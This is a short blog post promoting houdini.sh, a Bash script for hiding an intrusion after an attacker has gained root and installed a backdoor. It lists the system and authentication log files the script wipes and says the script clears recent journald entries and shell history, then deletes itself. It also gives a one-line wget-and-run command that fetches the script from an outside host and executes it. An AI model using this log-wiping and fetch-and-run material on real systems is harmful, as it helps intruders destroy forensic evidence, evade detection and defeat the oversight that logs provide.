Generally speaking, the pattern is always the same. You will find a vulnerability, you will exploit it, then comes the part of privileges escalation. And that's it, you are root, master of the machine and as you don't have time you will install a backdoor, somewhere, well hidden, to do what you want with this new machine later. And then... You logout! The first mistake has just been made.
Why? Because all the actions taken from the point of vulnerability exploitation to gaining root access are recorded in various files on the machine. It's akin to leaving your ID behind at the scene of a successful break-in - not a wise move.
To avoid this issue, I will be discussing about houdini.sh, a Bash script that helps cover the tracks left on a machine with a single command, much like a magician.
But what exactly does houdini.sh do?
On Linux systems, each action performed is recorded in a specific folder, typically /var/logs. Each service may have its own file within that folder for recording any issues, which can be helpful for debugging, but not so much when trying to be discreet.
Here are the files that houdini.sh will clear:
/var/log/audit/audit.log # Audit TTY input
/var/log/auth.log # Authenication logs
/var/log/boot.log # System boot log
/var/log/cron.log # Crond logs
/var/log/faillog # Faillog records
/var/log/httpd # Apache access and error logs directory
/var/log/kern.log # Kernel logs
/var/log/lastlog # SSH Last Login
/var/log/lighttpd # Lighttpd access and error logs directory
/var/log/maillog # Mail server logs
/var/log/messages # General message and system related stuff
/var/log/mysqld.log # MySQL database server log file
/var/log/qmail # Qmail log directory
/var/log/secure # Authentication log
/var/log/system.log # System Log
/var/log/tallylog # Tally Log
/var/log/utmp # Login records file
/var/log/wtmp # Login records file
/var/log/yum.log # Yum command log file
But it will also erase the last 3 hours of entries in the journalctl, as journald stores log data in a binary format instead of plaintext.
Another feature of houdini.sh is that it ensures that all commands entered during the current SSH session are also deleted.
Finally, the script will also delete itself. Leaving no trace behind.
Convenient, isn't it?
If the terminal is your magic wand then the incantation is the following:
wget https://gitlab.com/-/snippets/2150636/raw/main/houdini.sh && sh houdini.sh
And boom! You just disappeared and succeeded in your first magic trick 🧙
The script is open source and available on GitLab:
Use it wisely ! On that note, I'm going back to practice new magic tricks!
Thanks for reading!
Did you enjoy reading this article? You might also like this one. 3 scary tools that use Shodan search engine.
https://samy.link/blog/3-scary-tools-that-use-shodan-search-engine